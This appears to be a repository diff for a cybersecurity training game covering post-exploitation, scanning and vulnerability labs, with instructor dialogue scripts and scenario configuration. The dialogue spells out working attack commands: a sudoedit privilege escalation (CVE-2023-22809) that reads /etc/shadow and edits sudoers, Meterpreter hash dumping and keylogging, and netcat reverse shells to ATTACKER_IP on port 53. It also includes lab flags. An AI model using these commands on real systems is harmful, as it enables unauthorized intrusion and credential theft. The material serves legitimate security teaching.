set PAYLOAD cmd/unix/reverse
set LHOST YOUR_IP
exploit
+ [Show me access assessment commands]
**Assessing Access Level:**
whoami (show username)
id (show UID, GID, groups)
id -u (show just UID - 0 means root)
cat /etc/shadow (try to read - if fails, not root)
~ instructor_rapport += 3
#influence_increased
+ [Show me information gathering commands]
**Information Gathering (Linux):**
env (environment variables)
uname -a (kernel version)
cat /proc/cpuinfo (CPU info)
free -h (memory)
df -h (disk space)
cat /etc/passwd (user accounts)
sudo --version (check for vulnerable sudo)
ifconfig or ip a (network interfaces)
~ instructor_rapport += 3
#influence_increased
+ [Show me privilege escalation commands]
**Privilege Escalation (CVE-2023-22809):**
EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts
(View password hashes)
EDITOR='vim -- /etc/sudoers' sudoedit /etc/hosts
(Edit sudoers file - be very careful!)
In vim: Press Enter, type "Go", press Enter, type "distccd ALL=(ALL) NOPASSWD:ALL"
Press Esc, type ":x", press Enter, press Esc, type ":q!", press Enter
sudo -i (escalate to root)
~ instructor_rapport += 3
#influence_increased
+ [Show me Linux admin commands]
**Linux Post-Exploitation:**
useradd USERNAME (create user)
passwd USERNAME (set password)
cat /etc/passwd (list users)
sh (spawn command interpreter)
~ instructor_rapport += 3
#influence_increased
+ [Show me Metasploit post modules]
**Metasploit Post-Exploitation:**
Ctrl-Z (background session)
sessions (list sessions)
use post/linux/gather/checkvm
setg SESSION 1
exploit
**Useful Post Modules:**
post/linux/gather/enum_configs
post/linux/gather/enum_network
post/linux/gather/enum_system
post/linux/gather/enum_users_history
post/linux/gather/hashdump
~ instructor_rapport += 3
#influence_increased
+ [Show me Meterpreter commands]
**Meterpreter Commands:**
help (list all commands)
getuid (current user)
getprivs (privileges)
ls c:/ (browse files)
download FILE (download file)
upload LOCAL REMOTE (upload file)
ps (list processes)
migrate PID (migrate to process)
shell (drop to system shell, Ctrl-D to return)
run post/windows/gather/hashdump (dump hashes)
screenshot (capture screen)
keyscan_start / keyscan_dump (keylogging)
~ instructor_rapport += 3
#influence_increased
+ [Show me Armitage commands]
**Armitage Setup:**
sudo msfdb reinit
sudo armitage &
**Armitage Workflow:**
Hosts → Add Host → enter IP
Right-click host → Scan
Drag exploit onto target icon → Launch
Right-click compromised host → Meterpreter → Interact
**Pivoting:**
Right-click → Meterpreter → Pivoting → Setup → Add Pivot
~ instructor_rapport += 3
#influence_increased
- -> post_exploit_hub
=== challenge_tips ===
Let me give you practical tips for the post-exploitation challenges.
~ instructor_rapport += 5
#influence_increased
**Exploiting Distcc:**
Scan all ports to find distcc: nmap -p- TARGET
Use exploit/unix/misc/distcc_exec with cmd/unix/reverse payload
You'll get a shell as the distccd user, not root.
+ [Tips for privilege escalation?]
Check the sudo version immediately: sudo --version
If it's vulnerable (1.8.0-1.9.12p1), use the CVE-2023-22809 exploit.
When editing /etc/sudoers with vim, follow the commands EXACTLY - one wrong keystroke can break the VM.
After editing sudoers, run: sudo -i to become root.
Verify with: id -u (should show 0)
~ instructor_rapport += 5
#influence_increased
+ [Tips for using post-exploitation modules?]
Always background your session first with Ctrl-Z
Use "setg SESSION ID" to set the session globally for all modules.
Run multiple enum modules to gather comprehensive information.
The output tells you where loot is stored - check those files!
Not all modules work perfectly - if one fails, move on to others.
~ instructor_rapport += 5
#influence_increased
+ [Tips for using Meterpreter and Armitage?]
Exploit the Windows server with easyftp to get a Meterpreter session.
Use getuid and getprivs to understand your privileges immediately.
Browse to user desktops to find flags: ls C:\\Users\\
Try both Meterpreter commands and Armitage's GUI features.
If Meterpreter becomes unresponsive, restart the Windows VM and re-exploit.
~ instructor_rapport += 5
#influence_increased
+ [Tips for pivoting?]
Set up a pivot through the Windows system to attack Linux.
In Armitage: Right-click Windows → Meterpreter → Pivoting → Setup → Add Pivot
Add the Linux target: Hosts → Add Hosts → enter Linux IP
Scan and exploit through the pivot - it will be slower but will work.
The Armitage interface shows the routing path visually.
~ instructor_rapport += 5
#influence_increased
+ [Where are the flags?]
Linux flags are in user home directories under /home/
Use find /home -name "*flag*" to search for them.
Windows flags are on user Desktops: C:\\Users\\USERNAME\\Desktop\\
One Linux challenge involves cracking a protected.zip file.
You'll need to dump password hashes and crack them to get the zip password.
~ instructor_rapport += 5
#influence_increased
- -> post_exploit_hub
=== ready_for_practice ===
Excellent! You're ready for advanced post-exploitation techniques.
~ instructor_rapport += 10
#influence_increased
~ post_exploit_mastery += 10
#influence_increased
This lab completes your understanding of the full attack lifecycle - from initial reconnaissance through exploitation to post-exploitation.
You'll exploit systems, escalate privileges, gather sensitive data, and pivot through networks.
Remember: these techniques are powerful and potentially destructive. Use them only for authorized penetration testing and defensive security.
+ [Any final advice?]
Work methodically. After each exploitation, assess your access, gather information, then escalate privileges.
Take careful notes of what you find - credentials, software versions, vulnerable services.
When using the sudo privilege escalation, follow the vim commands EXACTLY. Practice on a non-critical system first if you're nervous.
Explore both Meterpreter commands and Armitage's interface to see which you prefer.
Don't get frustrated if something doesn't work - exploit reliability varies. Try restarting VMs and trying again.
Most importantly: understand WHY each technique works, not just HOW to execute it.
Good luck, Agent {player_name}. This is where you demonstrate the full impact of system compromise.
~ instructor_rapport += 10
#influence_increased
- -> post_exploit_hub
-> post_exploit_hub

1
scenarios/lab_post_exploitation/ink/instructor.json Normal file
View File

File diff suppressed because one or more lines are too long

33
scenarios/lab_post_exploitation/mission.json Normal file
View File

@@ -0,0 +1,33 @@
{
"display_name": "Post-exploitation",
"description": "Learn post-exploitation techniques including privilege escalation, information gathering, Meterpreter usage, and pivoting. Your advanced tactics instructor will guide you through maintaining access and covering tracks before you practice in a hands-on VM lab environment.",
"difficulty_level": 1,
"secgen_scenario": "labs/introducing_attacks/7_post-exploitation.xml",
"collection": "vm_labs",
"cybok": [
{
"ka": "AB",
"topic": "Models",
"keywords": ["kill chains"]
},
{
"ka": "MAT",
"topic": "Malicious Activities by Malware",
"keywords": ["cyber kill chain", "attack on confidentiality, integrity, availability"]
},
{
"ka": "MAT",
"topic": "Attacks and exploitation",
"keywords": ["Post-exploitation: pivoting attacks, information gathering"]
},
{
"ka": "SOIM",
"topic": "PENETRATION TESTING",
"keywords": [
"PENETRATION TESTING - SOFTWARE TOOLS",
"PENETRATION TESTING - ACTIVE PENETRATION"
]
}
]
}

180
scenarios/lab_post_exploitation/scenario.json.erb Normal file
View File

@@ -0,0 +1,180 @@
{
"scenario_brief": "Welcome to the Post-Exploitation Lab! Your advanced tactics instructor will guide you through privilege escalation, information gathering, Meterpreter, and pivoting. Complete the instruction and then practice your skills in the VM lab environment.",
"endGoal": "Complete the lab instruction with the advanced tactics instructor, launch the VMs, and capture all available flags from the Windows and Linux servers to demonstrate your understanding of post-exploitation techniques.",
"startRoom": "instruction_room",
"startItemsInInventory": [],
"globalVariables": {
"player_name": "Agent 0x00",
"lab_instruction_complete": false,
"vm_launched": false,
"post_exploit_mastery": 0
},
"objectives": [
{
"aimId": "complete_vm_lab",
"title": "Complete VM Lab Exercises",
"description": "Capture all flags from the Windows and Linux servers",
"status": "active",
"order": 0,
"tasks": [
{
"taskId": "submit_all_flags",
"title": "Submit all required flags from Windows and Linux servers",
"type": "submit_flags",
"targetFlags": ["windows_server-flag1", "linux_server-flag1", "linux_server-flag2"],
"targetCount": 3,
"currentCount": 0,
"showProgress": true,
"status": "active"
}
]
}
],
"player": {
"id": "player",
"displayName": "Agent 0x00",
"spriteSheet": "hacker",
"spriteTalk": "assets/characters/hacker-talk.png",
"spriteConfig": {
"idleFrameStart": 20,
"idleFrameEnd": 23
}
},
"rooms": {
"instruction_room": {
"type": "room_office",
"connections": {
"north": "vm_lab_room"
},
"locked": false,
"npcs": [
{
"id": "advanced_tactics_instructor",
"displayName": "Advanced Tactics Instructor",
"npcType": "person",
"position": { "x": 3.5, "y": 3.5 },
"spriteSheet": "hacker-red",
"spriteTalk": "assets/characters/hacker-red-talk.png",
"spriteConfig": {
"idleFrameStart": 20,
"idleFrameEnd": 23
},
"storyPath": "scenarios/lab_post_exploitation/ink/instructor.json",
"currentKnot": "start",
"timedConversation": {
"delay": 5000,
"targetKnot": "intro_timed"
},
"eventMappings": [
{
"eventPattern": "objective_aim_completed:complete_vm_lab",
"targetKnot": "flags_completed_congrats",
"conversationMode": "person-chat",
"autoTrigger": true,
"cooldown": 0
}
],
"itemsHeld": []
}
],
"objects": [
{
"type": "lab-workstation",
"id": "lab_workstation",
"name": "Lab Sheet Workstation",
"takeable": true,
"labUrl": "https://cliffe.github.io/HacktivityLabSheets/labs/introducing_attacks/7-post-exploitation/",
"observations": "A workstation for accessing the lab sheet with detailed instructions and exercises"
},
{
"type": "notes",
"name": "Lab Welcome Guide",
"takeable": true,
"readable": true,
"text": "Welcome to the Post-Exploitation Lab!\n\nOBJECTIVES:\n1. Use the Lab Sheet Workstation to access detailed lab instructions\n2. Complete the lab sheet exercises\n3. Launch the VMs and practice post-exploitation techniques\n4. Capture all flags from the Windows and Linux servers\n\nThe advanced tactics instructor is available if you need guidance.\n\nGood luck!",
"observations": "A guide to the lab structure and objectives"
},
{
"type": "notes",
"name": "VM Lab Instructions",
"takeable": true,
"readable": true,
"text": "VM Lab Practice Instructions:\n\n1. Launch the VMs in the VM Lab Room:\n - Kali VM Terminal: Your attacker machine with Metasploit and Armitage\n - Windows Server Terminal: Target for post-exploitation (EasyFTP vulnerability)\n - Linux Server Terminal: Target for post-exploitation (Distcc vulnerability)\n\n2. Your objectives:\n - Exploit both servers to gain initial access\n - Assess your access level and gather information\n - Escalate privileges (Linux: sudo CVE-2023-22809)\n - Use Meterpreter and post-exploitation modules\n - Capture flags from both systems\n - (Optional) Practice pivoting between systems\n\n3. Submit flags at the Flag Submission Terminal in the VM Lab Room\n\nFlags to capture:\n- flag from Windows server - After post-exploitation on Windows\n- flag from Linux server - After privilege escalation\n- flag from protected zip - After cracking password-protected zip file\n\nRemember what the instructor taught you about post-exploitation techniques!",
"observations": "Instructions for the VM lab exercises"
}
]
},
"vm_lab_room": {
"type": "room_office",
"connections": {
"south": "instruction_room"
},
"locked": false,
"objects": [
{
"type": "vm-launcher",
"id": "vm_launcher_kali",
"name": "Kali VM Terminal",
"takeable": false,
"observations": "Terminal providing access to the Kali Linux attacker machine with Metasploit and Armitage",
"hacktivityMode": <%= vm_context && vm_context['hacktivity_mode'] ? 'true' : 'false' %>,
"vm": <%= vm_object('post_exploitation', {
"id": 1,
"title": "kali",
"ip": "172.16.0.4",
"enable_console": true
}) %>
},
{
"type": "vm-launcher",
"id": "vm_launcher_windows_server",
"name": "Windows Server Terminal",
"takeable": false,
"observations": "Terminal providing access to the Windows server for post-exploitation practice",
"hacktivityMode": <%= vm_context && vm_context['hacktivity_mode'] ? 'true' : 'false' %>,
"vm": <%= vm_object('post_exploitation', {
"id": 2,
"title": "windows_server",
"ip": "172.16.0.2",
"enable_console": true
}) %>
},
{
"type": "vm-launcher",
"id": "vm_launcher_linux_server",
"name": "Linux Server Terminal",
"takeable": false,
"observations": "Terminal providing access to the Linux server for post-exploitation practice",
"hacktivityMode": <%= vm_context && vm_context['hacktivity_mode'] ? 'true' : 'false' %>,
"vm": <%= vm_object('post_exploitation', {
"id": 3,
"title": "linux_server",
"ip": "172.16.0.3",
"enable_console": true
}) %>
},
{
"type": "flag-station",
"id": "flag_station_lab",
"name": "Lab Flag Submission Terminal",
"takeable": false,
"observations": "Submit flags captured from the Windows and Linux servers here",
"acceptsVms": ["windows_server", "linux_server"],
"flags": [
"flag{post_exploitation_windows_success}",
"flag{post_exploitation_linux_success}",
"flag{post_exploitation_zip_cracked}"
],
"flagRewards": [
{
"type": "emit_event",
"event_name": "post_exploitation_flag_submitted",
"description": "Post-exploitation flag submitted - demonstrates post-exploitation skills"
}
]
}
]
}
}
}

1005
scenarios/lab_scanning/ink/instructor.ink Normal file
View File

File diff suppressed because it is too large Load Diff

1
scenarios/lab_scanning/ink/instructor.json Normal file
View File

File diff suppressed because one or more lines are too long

37
scenarios/lab_scanning/mission.json Normal file
View File

@@ -0,0 +1,37 @@
{
"display_name": "Information Gathering: Scanning",
"description": "Learn essential network scanning techniques including ping sweeps, port scanning, service identification, and operating system detection. Your reconnaissance specialist instructor will guide you through Nmap and other scanning tools before you practice in a hands-on VM lab environment.",
"difficulty_level": 1,
"secgen_scenario": "labs/introducing_attacks/5_scanning.xml",
"collection": "vm_labs",
"cybok": [
{
"ka": "AB",
"topic": "Models",
"keywords": ["kill chains"]
},
{
"ka": "MAT",
"topic": "Malicious Activities by Malware",
"keywords": ["cyber kill chain"]
},
{
"ka": "NS",
"topic": "PENETRATION TESTING",
"keywords": [
"PENETRATION TESTING - NETWORK MAPPING - FINGERPRINTING",
"PENETRATION TESTING - NETWORK MAPPING - NMAP",
"PENETRATION TESTING - NETWORK MAPPING - PING"
]
},
{
"ka": "SOIM",
"topic": "PENETRATION TESTING",
"keywords": [
"PENETRATION TESTING - NETWORK MAPPING - RECONNAISSANCE",
"PENETRATION TESTING - SOFTWARE TOOLS"
]
}
]
}

167
scenarios/lab_scanning/scenario.json.erb Normal file
View File

@@ -0,0 +1,167 @@
{
"scenario_brief": "Welcome to the Information Gathering: Scanning Lab! Your reconnaissance specialist instructor will guide you through network scanning techniques, Nmap usage, and information gathering. Complete the instruction and then practice your skills in the VM lab environment.",
"endGoal": "Complete the lab instruction with the reconnaissance specialist instructor, launch the VMs, and capture all available flags from the Linux victim server to demonstrate your understanding of network scanning techniques.",
"startRoom": "instruction_room",
"startItemsInInventory": [],
"globalVariables": {
"player_name": "Agent 0x00",
"lab_instruction_complete": false,
"vm_launched": false,
"scanning_ethics": 0
},
"objectives": [
{
"aimId": "complete_vm_lab",
"title": "Complete VM Lab Exercises",
"description": "Capture all flags from the Linux victim server",
"status": "active",
"order": 0,
"tasks": [
{
"taskId": "submit_all_flags",
"title": "Submit all required flags from Linux victim server",
"type": "submit_flags",
"targetFlags": ["linux_victim_server-flag1", "linux_victim_server-flag2", "linux_victim_server-flag3", "linux_victim_server-flag4"],
"targetCount": 4,
"currentCount": 0,
"showProgress": true,
"status": "active"
}
]
}
],
"player": {
"id": "player",
"displayName": "Agent 0x00",
"spriteSheet": "hacker",
"spriteTalk": "assets/characters/hacker-talk.png",
"spriteConfig": {
"idleFrameStart": 20,
"idleFrameEnd": 23
}
},
"rooms": {
"instruction_room": {
"type": "room_office",
"connections": {
"north": "vm_lab_room"
},
"locked": false,
"npcs": [
{
"id": "reconnaissance_specialist",
"displayName": "Reconnaissance Specialist",
"npcType": "person",
"position": { "x": 3.5, "y": 3.5 },
"spriteSheet": "hacker-red",
"spriteTalk": "assets/characters/hacker-red-talk.png",
"spriteConfig": {
"idleFrameStart": 20,
"idleFrameEnd": 23
},
"storyPath": "scenarios/lab_scanning/ink/instructor.json",
"currentKnot": "start",
"timedConversation": {
"delay": 5000,
"targetKnot": "intro_timed"
},
"eventMappings": [
{
"eventPattern": "objective_aim_completed:complete_vm_lab",
"targetKnot": "flags_completed_congrats",
"conversationMode": "person-chat",
"autoTrigger": true,
"cooldown": 0
}
],
"itemsHeld": []
}
],
"objects": [
{
"type": "lab-workstation",
"id": "lab_workstation",
"name": "Lab Sheet Workstation",
"takeable": true,
"labUrl": "https://cliffe.github.io/HacktivityLabSheets/labs/introducing_attacks/5-scanning/",
"observations": "A workstation for accessing the lab sheet with detailed instructions and exercises"
},
{
"type": "notes",
"name": "Lab Welcome Guide",
"takeable": true,
"readable": true,
"text": "Welcome to the Information Gathering: Scanning Lab!\n\nOBJECTIVES:\n1. Use the Lab Sheet Workstation to access detailed lab instructions\n2. Complete the lab sheet exercises\n3. Launch the VMs and practice scanning techniques\n4. Capture all flags from the Linux victim server\n\nThe reconnaissance specialist instructor is available if you need guidance.\n\nGood luck!",
"observations": "A guide to the lab structure and objectives"
},
{
"type": "notes",
"name": "VM Lab Instructions",
"takeable": true,
"readable": true,
"text": "VM Lab Practice Instructions:\n\n1. Launch the VMs in the VM Lab Room:\n - Kali VM Terminal: Your attacker machine with Nmap and scanning tools\n - Linux Victim Server Terminal: Target for scanning exercises\n\n2. Your objectives:\n - Use Nmap to discover live hosts and scan ports\n - Identify services and grab banners\n - Find flags hidden in banners, netcat messages, and via exploitation\n - Capture all flags from the Linux victim server\n\n3. Submit flags at the Flag Submission Terminal in the VM Lab Room\n\nFlags to capture from linux_victim_server:\n- flag1 - Found via banner grabbing or netcat\n- flag2 - Found via banner grabbing or netcat\n- flag3 - Found via banner grabbing (may be base64 encoded)\n- flag4 - Found via exploitation of familiar vulnerability (Distcc)\n\nRemember what the instructor taught you about scanning techniques!",
"observations": "Instructions for the VM lab exercises"
}
]
},
"vm_lab_room": {
"type": "room_office",
"connections": {
"south": "instruction_room"
},
"locked": false,
"objects": [
{
"type": "vm-launcher",
"id": "vm_launcher_kali",
"name": "Kali VM Terminal",
"takeable": false,
"observations": "Terminal providing access to the Kali Linux attacker machine with Nmap and scanning tools",
"hacktivityMode": <%= vm_context && vm_context['hacktivity_mode'] ? 'true' : 'false' %>,
"vm": <%= vm_object('information_gathering_scanning', {
"id": 1,
"title": "kali",
"ip": "172.16.0.2",
"enable_console": true
}) %>
},
{
"type": "vm-launcher",
"id": "vm_launcher_linux_victim_server",
"name": "Linux Victim Server Terminal",
"takeable": false,
"observations": "Terminal providing access to the Linux victim server for scanning practice",
"hacktivityMode": <%= vm_context && vm_context['hacktivity_mode'] ? 'true' : 'false' %>,
"vm": <%= vm_object('information_gathering_scanning', {
"id": 2,
"title": "linux_victim_server",
"ip": "172.16.0.10",
"enable_console": true
}) %>
},
{
"type": "flag-station",
"id": "flag_station_lab",
"name": "Lab Flag Submission Terminal",
"takeable": false,
"observations": "Submit flags captured from the Linux victim server here",
"acceptsVms": ["linux_victim_server"],
"flags": <%= flags_for_vm('linux_victim_server', [
'flag{scanning_banner_flag}',
'flag{scanning_netcat_flag}',
'flag{scanning_base64_flag}',
'flag{scanning_exploit_flag}'
]) %>,
"flagRewards": [
{
"type": "emit_event",
"event_name": "scanning_flag_submitted",
"description": "Scanning flag submitted - demonstrates network scanning skills"
}
]
}
]
}
}
}

775
scenarios/lab_vulnerabilities/ink/instructor.ink Normal file
View File

@@ -0,0 +1,775 @@
// Vulnerabilities, Exploits, and Remote Access Payloads Lab Sheet
// Based on HacktivityLabSheets: introducing_attacks/3_vulnerabilities.md
// Author: Z. Cliffe Schreuders, Anatoliy Gorbenko, Thalita Vergilio
// License: CC BY-SA 4.0
// Global persistent state
VAR instructor_rapport = 0
VAR exploitation_ethics = 0
// Global variables (synced from scenario.json.erb)
VAR player_name = "Agent 0x00"
=== start ===
~ instructor_rapport = 0
~ exploitation_ethics = 0
Welcome back, {player_name}. What would you like to discuss?
-> vulnerability_hub
// ===========================================
// TIMED INTRO CONVERSATION (Game Start)
// ===========================================
=== intro_timed ===
~ instructor_rapport = 0
~ exploitation_ethics = 0
Welcome to Vulnerabilities and Exploitation, {player_name}. I'm your penetration testing instructor for this session.
This lab explores one of the most critical threats in cybersecurity: software vulnerabilities. Even systems running only "trusted" software from major vendors can be compromised due to programming mistakes.
We'll explore how attackers exploit weaknesses in software systems, the difference between bind shells and reverse shells, and get hands-on with the Metasploit framework.
Let me explain how this lab works. You'll find three key resources here:
First, there's a Lab Sheet Workstation in this room. This gives you access to detailed written instructions and exercises that complement our conversation. Use it to follow along with the material.
Second, in the VM lab room to the north, you'll find terminals to launch virtual machines. You'll work with a Kali Linux attacker machine, a Windows victim system, and a Linux server for hands-on exploitation practice.
Finally, there's a Flag Submission Terminal where you'll submit flags you capture during the exercises. These flags demonstrate that you've successfully completed the challenges.
You can talk to me anytime to explore vulnerability concepts, get tips, or ask questions about the material. I'm here to help guide your learning.
Let me be clear: this knowledge is for authorized security testing, penetration testing engagements, and defensive purposes only. Understanding how attacks work is essential for defending against them.
Ready to get started? Feel free to ask me about any topic, or head to the lab sheet workstation and VM room when you're ready to begin the practical exercises.
~ exploitation_ethics += 10
#influence_increased
-> vulnerability_hub
=== vulnerability_hub ===
What aspect of vulnerabilities and exploitation would you like to explore?
+ [What are software vulnerabilities?]
-> software_vulnerabilities_intro
+ [What causes software vulnerabilities?]
-> vulnerability_causes
+ [Exploits and payloads - what's the difference?]
-> exploits_payloads
+ [Types of payloads and shellcode]
-> shellcode_intro
+ [Bind shells - how do they work?]
-> bind_shell_concept
+ [Reverse shells - the modern approach]
-> reverse_shell_concept
+ [Network Address Translation (NAT) considerations]
-> nat_considerations
+ [Introduction to Metasploit Framework]
-> metasploit_intro
+ [Using msfconsole - the interactive console]
-> msfconsole_basics
+ [Local exploits - attacking client applications]
-> local_exploits
+ [Remote exploits - attacking network services]
-> remote_exploits
+ [Show me the commands reference]
-> commands_reference
+ [Practical challenge tips]
-> challenge_tips
+ [I'm ready for the lab exercises]
-> ready_for_practice
+ [That's all for now] #exit_conversation
See you in the field, Agent.
-> vulnerability_hub
=== software_vulnerabilities_intro ===
Penetration Testing Instructor: Excellent question. A software vulnerability is a weakness in the security of a program.
~ instructor_rapport += 5
Penetration Testing Instructor: Think about it this way: what if an attacker wants to run malicious code on a system that only allows "trusted" software from companies like Microsoft or Adobe?
Penetration Testing Instructor: Unfortunately, it turns out that writing secure code is quite hard. Innocent and seemingly small programming mistakes can cause serious security vulnerabilities.
Penetration Testing Instructor: In many cases, software vulnerabilities can lead to attackers being able to take control of the vulnerable software. When an attacker can run any code they like, this is known as "arbitrary code execution."
+ [What does arbitrary code execution allow an attacker to do?]
Penetration Testing Instructor: With arbitrary code execution, attackers can essentially assume the identity of the vulnerable software and misbehave.
Penetration Testing Instructor: For example, if they compromise a web browser, they can access anything the browser can access - your files, your cookies, your session tokens.
Penetration Testing Instructor: If they compromise a system service running as administrator or root, they have complete control over the entire system.
~ instructor_rapport += 5
+ [Can you give me a real-world example?]
Penetration Testing Instructor: Sure. Adobe Reader versions before 8.1.2 had vulnerabilities that allowed attackers to craft malicious PDF documents.
Penetration Testing Instructor: When a victim opened the PDF, the attacker could execute arbitrary code on their system - just by opening what appeared to be a normal document.
Penetration Testing Instructor: Another example is the Distcc vulnerability (CVE-2004-2687). Anyone who could connect to the Distcc port could execute arbitrary commands on the server.
~ instructor_rapport += 5
+ [Tell me more about the causes]
-> vulnerability_causes
- -> vulnerability_hub
=== vulnerability_causes ===
Penetration Testing Instructor: Software vulnerabilities arise from three main categories of mistakes.
~ instructor_rapport += 5
Penetration Testing Instructor: First, there are design flaws - fundamental mistakes in how the system was architected. These are problems with the concept itself, not just the implementation.
Penetration Testing Instructor: Second, implementation flaws - mistakes in the programming code. This includes buffer overflows, SQL injection vulnerabilities, cross-site scripting flaws, and so on.
Penetration Testing Instructor: Third, misconfiguration - mistakes in settings and configuration. Even secure software can be made vulnerable through poor configuration choices.
+ [Which type is most common?]
Penetration Testing Instructor: Implementation flaws are incredibly common because programming secure code is difficult, especially in languages like C and C++ that don't have built-in protections.
Penetration Testing Instructor: However, misconfigurations are also extremely prevalent because systems are complex and it's easy to overlook security settings.
Penetration Testing Instructor: Design flaws are less common but can be more fundamental and harder to fix without major rearchitecture.
~ instructor_rapport += 5
+ [Can these vulnerabilities be completely prevented?]
Penetration Testing Instructor: That's a great question that gets at a fundamental challenge in security.
Penetration Testing Instructor: Complete prevention is nearly impossible in complex software. However, we can significantly reduce vulnerabilities through secure coding practices, code review, security testing, and using modern languages with built-in protections.
Penetration Testing Instructor: This is why defense in depth is important - we assume vulnerabilities will exist and add layers of protection.
~ instructor_rapport += 5
- -> vulnerability_hub
=== exploits_payloads ===
Penetration Testing Instructor: Let me clarify these two important concepts.
~ instructor_rapport += 5
Penetration Testing Instructor: An exploit is an action - or a piece of software that performs an action - that takes advantage of a vulnerability.
Penetration Testing Instructor: The result is that an attacker makes the system perform in ways that are not intentionally authorized. This could include arbitrary code execution, changes to databases, or denial of service like crashing the system.
Penetration Testing Instructor: The action that takes place when an exploit is successful is known as the payload.
+ [So the exploit is the delivery mechanism?]
Penetration Testing Instructor: Exactly! Think of it like this: the exploit is the lock pick, and the payload is what you do once you're inside.
Penetration Testing Instructor: The exploit leverages the vulnerability to gain control, and the payload is the malicious code that runs once control is achieved.
Penetration Testing Instructor: In Metasploit, you can mix and match exploits with different payloads, giving tremendous flexibility.
~ instructor_rapport += 5
+ [What kinds of payloads are there?]
-> shellcode_intro
- -> vulnerability_hub
=== shellcode_intro ===
Penetration Testing Instructor: The most common type of payload is shellcode - code that gives the attacker shell access to the target system.
~ instructor_rapport += 5
Penetration Testing Instructor: With shell access, attackers can interact with a command prompt and run commands on the target system as if they were sitting at the keyboard.
Penetration Testing Instructor: Metasploit has hundreds of different payloads. You can list them with the msfvenom command:
Penetration Testing Instructor: msfvenom -l payload pipe to less
Penetration Testing Instructor: There are two main approaches to achieving remote shell access: bind shells and reverse shells.
+ [What's a bind shell?]
-> bind_shell_concept
+ [What's a reverse shell?]
-> reverse_shell_concept
+ [Which one should I use?]
Penetration Testing Instructor: In modern penetration testing, reverse shells are almost always the better choice.
Penetration Testing Instructor: They bypass most firewall configurations and work even when the target is behind NAT.
Penetration Testing Instructor: But let me explain both so you understand the trade-offs.
~ instructor_rapport += 5
- -> vulnerability_hub
=== bind_shell_concept ===
Penetration Testing Instructor: A bind shell is the simplest approach. The payload listens on the network for a connection, and serves up a shell to anything that connects.
~ instructor_rapport += 5
Penetration Testing Instructor: Think of it like this: the victim's computer opens a port and waits. The attacker then connects to that port and gets a command prompt.
Penetration Testing Instructor: You can simulate this with netcat. On the victim system, run:
Penetration Testing Instructor: nc.exe -l -p 31337 -e cmd.exe -vv
Penetration Testing Instructor: Then from the attacker system, connect with:
Penetration Testing Instructor: nc VICTIM_IP 31337
+ [What do those netcat flags mean?]
Penetration Testing Instructor: Good attention to detail! Let me break it down:
Penetration Testing Instructor: The -l flag tells netcat to listen as a service rather than connect as a client.
Penetration Testing Instructor: The -p flag specifies the port number to listen on.
Penetration Testing Instructor: The -e flag executes the specified program (cmd.exe on Windows, /bin/bash on Linux) and pipes all interaction through the connection.
Penetration Testing Instructor: The -vv flag makes it very verbose, showing you what's happening.
~ instructor_rapport += 5
+ [What's the main limitation of bind shells?]
Penetration Testing Instructor: Excellent question. Firewalls and NAT routing are the main problems.
Penetration Testing Instructor: Nowadays, firewalls typically prevent incoming network connections unless there's a specific reason to allow them - like the system being a web server.
Penetration Testing Instructor: If the victim is behind a NAT router or firewall that blocks incoming connections, your bind shell is useless.
Penetration Testing Instructor: This is why reverse shells became the dominant approach.
~ instructor_rapport += 5
+ [Tell me about reverse shells instead]
-> reverse_shell_concept
- -> vulnerability_hub
=== reverse_shell_concept ===
Penetration Testing Instructor: Reverse shells solve the firewall and NAT problems by reversing the connection direction.
~ instructor_rapport += 5
Penetration Testing Instructor: Instead of the attacker connecting to the victim, the victim connects to the attacker!
Penetration Testing Instructor: Here's how it works: the attacker starts listening on their system, then the payload on the victim's system initiates an outbound connection to the attacker.
Penetration Testing Instructor: This works because firewalls typically allow outbound connections. They have to - otherwise you couldn't browse websites or check email.
+ [How do you set up a reverse shell with netcat?]
Penetration Testing Instructor: On the attacker system (Kali), start listening:
Penetration Testing Instructor: nc -l -p 53 -vv
Penetration Testing Instructor: On the victim system, connect back:
Penetration Testing Instructor: nc.exe ATTACKER_IP 53 -e cmd.exe -vv
Penetration Testing Instructor: Notice the victim is making the connection, but you still get a shell on your attacker system.
~ instructor_rapport += 5
+ [Why use port 53 specifically?]
Penetration Testing Instructor: Brilliant observation! Port 53 is used by DNS - the Domain Name System that resolves domain names to IP addresses.
Penetration Testing Instructor: Almost every Internet-connected system needs DNS to function. It's how "google.com" becomes an IP address.
Penetration Testing Instructor: Because DNS is essential, it's extremely rare for firewalls to block outbound connections on port 53.
Penetration Testing Instructor: By using port 53, we're disguising our reverse shell connection as DNS traffic, making it very likely to get through.
~ instructor_rapport += 5
+ [What about NAT and public IP addresses?]
-> nat_considerations
- -> vulnerability_hub
=== nat_considerations ===
Penetration Testing Instructor: Network Address Translation adds another complication worth understanding.
~ instructor_rapport += 5
Penetration Testing Instructor: Often computer systems share one public IP address via a router, which then sends traffic to the correct local IP address using NAT.
Penetration Testing Instructor: Unless port forwarding is configured on the router, there's no way to connect directly to a system without a public IP address.
Penetration Testing Instructor: This is another reason reverse shells are necessary - they can start connections from behind NAT to systems with public IPs.
+ [So the attacker needs a public IP?]
Penetration Testing Instructor: For a reverse shell to work, yes - the attacker needs a publicly routable IP address, or port forwarding from one.
Penetration Testing Instructor: This is why attackers often use VPS (Virtual Private Servers) or compromised servers as command and control infrastructure.
Penetration Testing Instructor: In penetration testing engagements, you might work with the client's network team to set up proper port forwarding.
~ instructor_rapport += 5
+ [What if both systems are behind NAT?]
Penetration Testing Instructor: Then you'd need more advanced techniques like tunneling through a public server, or exploiting Universal Plug and Play (UPnP) to create port forwards.
Penetration Testing Instructor: Some attack frameworks use domain generation algorithms or communicate through third-party services like social media APIs.
Penetration Testing Instructor: But that's getting into advanced command and control techniques beyond this basic lab.
~ instructor_rapport += 5
- -> vulnerability_hub
=== metasploit_intro ===
Penetration Testing Instructor: The Metasploit Framework is one of the most powerful and comprehensive tools for exploitation and penetration testing.
~ instructor_rapport += 5
Penetration Testing Instructor: At its core, Metasploit provides a framework - a set of libraries and tools for exploit development and deployment.
Penetration Testing Instructor: It includes modules for specific exploits, payloads, encoders, post-exploitation tools, and other extensions.
Penetration Testing Instructor: The framework has several interfaces you can use: msfconsole (the interactive text console), the web-based Metasploit Community/Pro editions, and Armitage (a graphical interface).
+ [How many exploits does it include?]
Penetration Testing Instructor: Depending on the version and when it was last updated, Metasploit typically includes over two thousand different exploits!
Penetration Testing Instructor: When you start msfconsole, it reports the exact number of exploit modules available.
Penetration Testing Instructor: You can see them all with the "show exploits" command, though that list is quite long.
